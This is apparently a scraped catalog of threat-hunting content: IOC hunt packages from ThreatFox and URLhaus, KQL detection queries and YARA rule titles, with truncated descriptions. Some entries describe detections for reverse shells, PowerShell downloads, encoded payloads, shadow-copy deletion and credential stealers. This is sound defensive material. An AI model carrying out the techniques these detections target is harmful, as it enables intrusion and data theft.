DnsEventsUrlClickEvents
Hunt package for 8 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 23 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Unknown Loader
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with Unknown Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 16 IOCs associated with Cobalt Strike
ThreatFox: CountLoader IOCs
ioc-hunt high
DnsEvents
Hunt package for 8 IOCs associated with CountLoader
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: PureRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with PureRAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with Remus
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with SectopRAT
ThreatFox: Tofsee IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Tofsee
ThreatFox: ValleyRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 12 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with VShell
Trojan Derusbi
yara low
YARA rule: Trojan_Derusbi
CloudAppEvents
This query looks for users sharing access to files with external users. This applies to SharePoint and OneDrive users. Audit event and Cloud application identifier references. Reference - https://l
URLhaus: 134-199-190-221 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 134-199-190-221
URLhaus: 165-227-155-54 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 165-227-155-54
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 47 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as arm
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as ClearFake
URLhaus: e73f7ff7572070d56a631ac6796adabd Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as e73f7ff7572070d56a631ac6796adabd
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as Mozi
URLhaus: ocx Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as ocx
VMWare-LPE-2022-22960
kql medium
T1204T1548
DeviceProcessEvents
The query checks process command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root. This vulnerability of VMware Workspace ONE Access, Identity Manager
Tt1574
DeviceFileEvents
The query digs in Windows print spooler drivers folder for any file creations, MANY OF THE FILES THAT SHOULD COME UP HERE MAY BE LEGIT. Suspicious DLL is load from Spooler Service backup folder. This
anomalous-payload-delivered-from-iso-file
kql medium
T1204.003
DeviceEventsDeviceProcessEvents
This query looks for lnk file executions from other locations than C: -drive, which can relate to mounted ISO-files. Reference - https://threathunt.blog/detecting-a-payload-delivered-with-iso-files-us
TheMask / Careto CnC communication signature
TheMask / Careto known command and control domains
TheMask / Careto OSX component signature
TheMask / Careto SGH component signature
Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo
Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo
Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo
Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo
check-for-shadowhammer-activity-implant
kql medium
DeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEvents
This query was originally published in the threat analytics report, ShadowHammer supply chain attack Operation ShadowHammer was an attack against ASUS computer hardware, using the company's own update
Detect functions coded with ROR edi,D; Detect CobaltStrike used by differents groups APT
detect-anomalous-process-trees
kql medium
DeviceProcessEvents
This query generates process trees of given processes and performs anomaly detection on the process trees. It generates process trees up to 7th level. The query can be used as a template to perform an
detect-bluekeep-related-mining
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i
detect-doublepulsar-execution
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Motivated miners. Doublepulsar is a backdoor developed by the National Security Agency (NSA). First disclosed in 2017, it is now use
detect-exploitation-of-cve-2018-8653
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, CVE-2018-8653 scripting engine vulnerability. CVE-2018-8653 is a remote code execution vulnerability found in the scripting engine f
detect-impacket-atexec
kql medium
T1053
DeviceEventsDeviceProcessEventsDeviceRegistryEvents
This query looks for signs of impacket atexec module. Should work with others using similar technique. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-part-3/
detect-impacket-dcomexec
kql medium
T1559.001
DeviceNetworkEventsDeviceProcessEvents
This query looks for signs of impacket dcomexec module. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-part-2/
detect-impacket-psexec-module
kql medium
T1569.002
DeviceEventsDeviceFileEventsDeviceProcessEvents
This query looks for signs of impacket psexec module usage. May hit other psexec-like techniques too. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-psexec/
detect-impacket-wmiexec
kql medium
T1047
DeviceEventsDeviceNetworkEventsDeviceProcessEvents
This query looks for signs of impacket wmiexec module usage. May hit other wmi execution-like techniques too. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-part-2/
detect-malicious-rar-extraction
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, CVE-2018-15982 exploit attacks. CVE-2018-15982 is an exploit of Adobe Flash Player, that allows for remote execution of arbitrary co
detect-malicious-use-of-msiexec
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Msiexec abuse. Msiexec.exe is a Windows component that installs files with the .msi extension. These kinds of files are Windows inst
detect-malicious-use-of-msiexec-mimikatz
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Msiexec abuse. Msiexec.exe is a Windows component that installs files with the .msi extension. These kinds of files are Windows inst
detect-malicious-use-of-msiexec-powershell
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Msiexec abuse. Msiexec.exe is a Windows component that installs files with the .msi extension. These kinds of files are Windows inst
T1221
DeviceProcessEvents
This query detects possible abuse of ms-msdt MSProtocol URI scheme to load and execute malicious code via Microsoft Support Diagnostic Tool Vulnerability (CVE-2022-30190). The following query detects
detect-office-products-spawning-wmic
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ursnif (Gozi) continues to evolve. Windows Management Instrumentation, or WMI, is a legitimate Microsoft framework used to obtain ma
Detect potential kerberoast activities
kql medium
IdentityLogonEvents
This query aim to detect if someone requests service tickets (where count => maxcount) The query requires trimming to set a baseline level for MaxCount Mitre Technique: Kerberoasting (T1558.003) @Ma
detect-suspicious-mshta-usage
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Ursnif (Gozi) continues to evolve. Microsoft HTML Applications, or HTAs, are executable files that use the same technologies and mod
detect-uac-elevation
kql medium
DeviceProcessEvents
This query identifies UAC elevated processes by analyzing launches of consent.exe (the process that performs UAC elevation). The first parameter of consent.exe is the process ID being elevated, theref
detect-web-server-exploit-doublepulsar
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Motivated miners. Doublepulsar is a backdoor developed by the National Security Agency (NSA). First disclosed in 2017, it is now use
CRASHOVERRIDE v1 Config File Parsing
yara low
CRASHOVERRIDE v1 Config File Parsing
CRASHOVERRIDE v1 Suspicious Export
yara low
CRASHOVERRIDE v1 Suspicious Export
CRASHOVERRIDE Malware Hashes
yara low
CRASHOVERRIDE Malware Hashes
IEC-104 Interaction Module Program Strings
CRASHOVERRIDE v1 Suspicious Strings and Export
CRASHOVERRIDE v1 Wiper
yara low
CRASHOVERRIDE v1 Wiper
Blank mutex creation assoicated with CRASHOVERRIDE
jse-launched-by-word
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Emulation-evading JavaScripts. Attackers in several ransomware campaigns have employed heavily obfuscated JavaScript code, in order
launch-questd-w-osascript
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is
locate-shlayer-payload-decryption-activity
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, OSX/Shlayer sustains adware push. Shlayer is adware that spies on users' search terms, and redirects network traffic to serve the us
locate-shlayer-payload-decrytion-activity
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, OSX/Shlayer sustains adware push. Shlayer is adware that spies on users' search terms, and redirects network traffic to serve the us
DeviceProcessEvents
This query was originally published in the threat analytics report, OSX/SurfBuyer adware campaign. It will return results if a shell script has furtively attempted to decode and save a file to a /tmp
office-apps-launching-wscipt
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Trickbot: Pervasive & underestimated. Trickbot is a very prevalent piece of malware with an array of malicious capabilities. Origina
DeviceProcessEvents
This query identifies common processes run by ransomware malware to destroy volume shadow copies or clean free space on a drive to prevent a file from being recovered post-encryption. To reduce false
DeviceProcessEventsEmailEvents
Malicious emails often contain documents and other specially crafted attachments that run PowerShell commands to deliver additional payloads. If you are aware of emails coming from a known malicious s
PowerShell downloads
kql medium
DeviceProcessEvents
Finds PowerShell execution events that could involve a download.
powershell-version-2.0-execution
kql medium
DeviceProcessEvents
Find the execution of PowerShell Version 2.0, eather to discover legacy scripts using version 2 or to find attackers trying to hide from script logging and AMSI.
PowershellCommand footprint
kql medium
DeviceEvents
Find all machines running a given Powersehll cmdlet. This covers all Powershell commands executed in the Powershell engine by any process.
DeviceEvents
Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period. This covers all Powershell commands executed in the Powershell engine by any process.
python-based-attacks-on-macos
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Python abuse on macOS The Python programming language comes bundled with macOS. In threat intelligence gathered from macOS endpoints
qakbot-campaign-suspicious-javascript
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware Qakbot is malware that steals login credentials from banking and financial services. It has
reverse-shell-nishang
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne
reverse-shell-nishang-base64
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne
RunMRU with non-ASCII characters
kql medium
T1204.004
DeviceRegistryEvents
Identifies non-ASCII data written to the RunMRU registry key by explorer.
sql-server-abuse
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, SQL Server abuse. SQL Server offers a vast array of tools for automating tasks, exporting data, and running scripts. These legitimat
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 8 IOCs associated with Kimwolf
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Mirai
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 60 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 17 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 23 IOCs associated with Cobalt Strike
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with Lumma Stealer
ThreatFox: nccTrojan IOCs
ioc-hunt high
DeviceFileEvents
The nccTrojan malware is a stealthy backdoor that establishes persistent remote access, exfiltrates sensitive data, and executes arbitrary commands to compromise infected systems. It typically arrives via phishing emails with malicious attachments or exploit kits bundled with legitimate software. SOC analysts should monitor
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with NetSupportManager RAT
ThreatFox: PureRAT IOCs
ioc-hunt high
DnsEventsUrlClickEvents
PureRAT is a remote access trojan that enables attackers to exfiltrate data, execute arbitrary commands,
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Remcos is a remote access Trojan (RAT) that enables attackers to steal sensitive data, execute arbitrary
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with Remus
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and leveraging stolen credentials for lateral movement. It typically arrives through phishing emails with malicious attachments or compromised websites, using URL and domain-based command-and
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 17 IOCs associated with VShell
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
XWorm is a multi-stage malware that establishes persistence, exfiltrates data, and leverages command-and-control (C2) communication to execute further malicious activities. It typically arrives via phishing emails containing malicious links or compromised domains/IPs used for initial compromise. SOC analysts should monitor for unusual network traffic patterns, lateral
umworkerprocess-unusual-subprocess-activity
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 46 malicious URLs tagged as 32-bit
URLhaus: 54e64e Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 54e64e
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 17 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 28 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mozi malware family is a backdoor that enables remote
Webserver Executing Suspicious Applications
kql medium
DeviceProcessEvents
This query looks for common webserver process names and identifies any processes launched using a scripting language (cmd, powershell, wscript, cscript), common initial profiling commands (net \ net1
Encoded version of pcclient found on disk
File matching the md5 above tends to only live in memory, hence the lack of MZ header check.
yara low
File matching the md5 above tends to only live in memory, hence the lack of MZ header check.
File matching the md5 above tends to only live in memory, hence the lack of MZ header check.
yara low
File matching the md5 above tends to only live in memory, hence the lack of MZ header check.
Detects code from APT wateringhole
yara low
Detects code from APT wateringhole
APT malware used to drop PcClient RAT
The YARA rule 'apt_c16_win64
3102 code features
yara low
3102 code features
3102 Identifying Strings
yara low
3102 Identifying Strings
9002
yara low
9002
9002 code features
yara low
9002 code features
9002 Identifying Strings
yara low
9002 Identifying Strings
Attacked more than x times average
kql medium
T1566
EmailEvents
This query helps reviewing count of users attacked more than x times average.
Base64 Detector and Decoder
kql medium
DeviceProcessEvents
This query will identify strings in process command lines which match Base64 encoding format, extract the string to a column called Base64, and decode it in a column called DecodedString.
Base64encodePEFile
kql medium
DeviceProcessEvents
Finding base64 encoded PE files header seen in the command line parameters. Tags: #fileLess #powershell.
Bitsadmin Activity
kql medium
DeviceProcessEvents
Background Intelligent Transfer Service (BITS) is a way to reliably download files from webservers or SMB servers. This service is commonly used for legitimate purposes, but can also be used as part
Detects BlackEnergy 2 Malware
yara low
Detects BlackEnergy 2 Malware
Blocked Clicks Trend
kql medium
T1566
UrlClickEvents
Visualises the trend of malicious URL clicks that were blocked by Safe Links over the past 30 days, helping analysts monitor the effectiveness of click protection policies. Based on Defender for Offic
This is a patched CMD. This is the CMD that RoyalCli uses.
Detect Encoded Powershell
kql medium
DeviceProcessEvents
This query will detect encoded powershell based on the parameters passed during process creation. This query will also work if the PowerShell executable is renamed or tampered with since detection is
Detect PowerShell v2 Downgrade
kql medium
DeviceImageLoadEvents
This query looks for processes that load an older version of the system.management.automation libraries. While not inherently malicious, downgrading to PowerShell version 2 can enable an attacker to b
End user malicious clicks
kql medium
T1566
UrlClickEvents
This query helps reviewing list of top users click on Phis URLs
ExecuteBase64DecodedPayload
kql medium
DeviceProcessEvents
Process executed from binary hidden in Base64 encoded file. Encoding malicious software is a. Technique to obfuscate files from detection. The first and second ProcessCommandLine component is looking
FE APT 9002
yara low
YARA rule: FE_APT_9002
File Copy and Execution
kql medium
DeviceFileEventsDeviceLogonEventsDeviceNetworkEventsDeviceProcessEvents
This query identifies files that are copied to a device over SMB, then executed within a specified threshold. Default is 5 seconds, but is configurable by tweaking the value for ToleranceInSeconds.
Malicious Clicks allowed (click-through)
kql medium
T1566
UrlClickEvents
Visualises malicious URL clicks that were allowed through Safe Links over time, helping analysts identify when users bypass security controls and click on malicious content. Based on Defender for Offi
Malicious Emails with QR code Urls
kql medium
T1566
EmailEventsEmailUrlInfo
Visualises emails containing QR code URLs that have been detected as malicious, helping analysts identify QR code-based attack campaigns. Based on Defender for Office 365 workbook: https://techcommuni
Malicious mails by sender IPs
kql medium
T1566
EmailEvents
This query helps reviewing sender IPs sending malicious email of type Malware or Phish
Malicious URL Clicks by workload
kql medium
T1566
UrlClickEvents
Visualises click attempts on malicious URLs, grouped by workload (such as Exchange, Teams, SharePoint, Copilot etc.), to help analysts understand which workloads are most targeted. Based on Defender f
APT15 bs2005
yara low
APT15 bs2005
This is a an exchange enumeration/hijacking tool used by an APT 15
Find generic data potentially relating to AP15 tools
Generic strings found in the Royal CLI tool
APT15 RoyalCli backdoor
yara low
APT15 RoyalCli backdoor
DNS backdoor used by APT15
yara low
DNS backdoor used by APT15
Malware_In_recyclebin
kql medium
DeviceProcessEvents
Finding attackers hiding malware in the recycle bin. Read more here: https://azure.microsoft.com/blog/how-azure-security-center-helps-reveal-a-cyberattack/. Tags: #execution #SuspiciousPath.
Masquerading system executable
kql medium
DeviceProcessEvents
Finds legitimate system32 or syswow64 executables being run under a different name and in a different location. The rule will require tuning for your environment. MITRE: Masquerading https://attack.mi
Detects PAS Tool PHP Web Kit
yara low
Detects PAS Tool PHP Web Kit
PhishingEmailUrlRedirector (1)
kql medium
T1566
EmailUrlInfo
The query helps detect emails associated with the open redirector URL campaign using Defender for Office 365 data.
Post Delivery Events by Admin
kql medium
T1566
This query visualises the daily amount of emails that had an admin post delivery action, summarizing the data by action type
Post Delivery Events by Location
kql medium
T1566
This query visualises the amount of emails that had a post delivery action, summarizing the data daily by the final location as a result of the action
Post Delivery Events by ZAP type
kql medium
T1566
This query visualises the daily amount of emails that had a post delivery action from zero-hour auto purge, summarizing by phish,spam or malware detection action
Post Delivery Events over time
kql medium
T1566
This query visualises the daily amount of emails that had a post delivery action from zero-hour auto purge.
SafeLinks URL detections
kql medium
T1566
EmailEvents
This query provides insights on the detections done by SafeLinks protection in Defender for Office 365
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DeviceFileEventsDnsEvents
Hunt package for 61 IOCs associated with ClearFake
ThreatFox: EtherRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with EtherRAT
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with FAKEUPDATES
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 32 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Unknown Stealer
ThreatFox: ACR Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with ACR Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 36 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DCRat is a remote access Trojan that enables adversaries to exfiltrate data and execute commands on infected systems. It typically arrives via phishing emails or malicious downloads, establishing communication through the identified IP:port
ThreatFox: GCleaner IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 5 IOCs associated with GCleaner
ThreatFox: PureRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with PureRAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Remus
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 17 IOCs associated with VShell
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with XWorm
Top 10% of most attacked users
kql medium
T1566
EmailEvents
This query helps reviewing the list of top 10% of most attacked users
Top 10 URL domains attacking organization
kql medium
T1566
EmailEventsEmailUrlInfo
This query helps reviewing list of top 10 URL domains attacking the organization
T1566
UrlClickEvents
Visualises the top 10 users with click attempts on URLs in emails detected as malware, helping analysts identify risky user behaviour and potential targets. Based on Defender for Office 365 workbook:
T1566
UrlClickEvents
Visualises the top 10 users with click attempts on URLs in emails detected as phishing, helping analysts identify risky user behaviour and potential targets. Based on Defender for Office 365 workbook:
T1566
UrlClickEvents
Visualises the top 10 users with click attempts on URLs in emails detected as spam, helping analysts identify risky user behaviour and potential targets. Based on Defender for Office 365 workbook: htt
Top external malicious senders
kql medium
T1566
EmailEvents
This query helps reviewing external top malicious email sender with malware or phishing emails in an organization in last 30 days
Top targeted users
kql medium
T1566
EmailEvents
This query helps reviewing top targeted users with malware or phishing emails in an organization in last 30 days
URL Click attempts by threat type
kql medium
T1566
UrlClickEvents
Visualises the total amount of click attempts on URLs with detections, split by the different threat types identified. Based on Defender for Office 365 workbook: https://techcommunity.microsoft.com/bl
URL click count by click action
kql medium
T1566
UrlClickEvents
This query helps reviewing URL click count by ClickAction
URL click on ZAP email
kql medium
T1566
AlertEvidenceUrlClickEvents
In this query, we are looking for Url clicks on emails which get actioned by Zerohour auto purge
URL clicks actions by URL
kql medium
T1566
UrlClickEvents
In this query, we are looking URL click actions by URL in the last 7 days
URL Clicks by Action
kql medium
T1566
UrlClickEvents
Summarizes URL click events by action type to help analysts understand user click behavior and policy effectiveness. Based on Defender for Office 365 workbook: https://techcommunity.microsoft.com/blog
T1566
AlertEvidenceUrlClickEvents
In this query, we are looking for Url clicks on emails which are generated the alert-A potentially malicious URL click was detected
URLhaus: 102-220-160-47 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as 102-220-160-47
URLhaus: 176-65-139-194 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 176-65-139-194
URLhaus: 176-65-139-7 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as 176-65-139-7
URLhaus: 176-65-139-99 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 176-65-139-99
URLhaus: 176-65-149-239 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as 176-65-149-239
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as 32-bit
URLhaus: 93-115-172-57 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as 93-115-172-57
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as arm
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as ClearFake
URLhaus: dropped-by-Phorpiex Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as dropped-by-Phorpiex
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 34 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mirai malware family compromises IoT devices by exploiting default credentials, turning them into bots for large-scale DDoS
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
URLhaus: RemcosRAT Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as RemcosRAT
URLs by location
kql medium
T1566
EmailUrlInfo
Visualises where URLs have been identified in emails, summarizing by location (for example: Attachment, header, body) to help analysts understand distribution and risk. Based on Defender for Office 36
User clicked through events
kql medium
T1566
UrlClickEvents
This query helps reviewing malicious clicks where user was allowed to proceed through malicious URL page.
User clicks on malicious inbound emails
kql medium
T1566
EmailEventsUrlClickEvents
This query provides insights on users who clicked on a suspicious URL
User clicks on phishing URLs in emails
kql medium
T1566
EmailEventsUrlClickEvents
This query helps in determining clickthroughs when email delivered because of detection overrides.
User reported submissions
kql medium
T1566
CloudAppEvents
This query helps reviewing user reported email submissions
Detects PAS Tool PHP Web Kit
yara low
Detects PAS Tool PHP Web Kit
Detects PAS Tool PHP Web Kit
yara low
Detects PAS Tool PHP Web Kit
Admin Submission Trend (FN)
kql medium
T1566
CloudAppEvents
This query visualises the daily amount of admin false negative submission by submission type.
Admin Submission Trend (FP)
kql medium
T1566
CloudAppEvents
This query visualises the daily amount of admin false positive submission by submission type.
Admin Submissions by Detection Type
kql medium
T1566
CloudAppEvents
This query visualises all emails submitted as false positive by admins summarizing by the original filter verdict threat type
T1566
CloudAppEvents
This query visualises the original detection technology of emails submitted as phish false positive by admins
T1566
CloudAppEvents
This query visualises the original detection technology of emails submitted as spam false positive by admins
Admin Submissions by Grading verdict (FN-FP)
kql medium
T1566
CloudAppEvents
This query visualises the total amount of admin false negative or false positive submissions by the verdict of the submission grading.
Admin Submissions by Submission State (FN)
kql medium
T1566
CloudAppEvents
This query visualises the total amount of admin false negative submissions by the state of the submission.
Admin Submissions by Submission State (FP)
kql medium
T1566
CloudAppEvents
This query visualises the total amount of admin false positive submissions by the state of the submission.
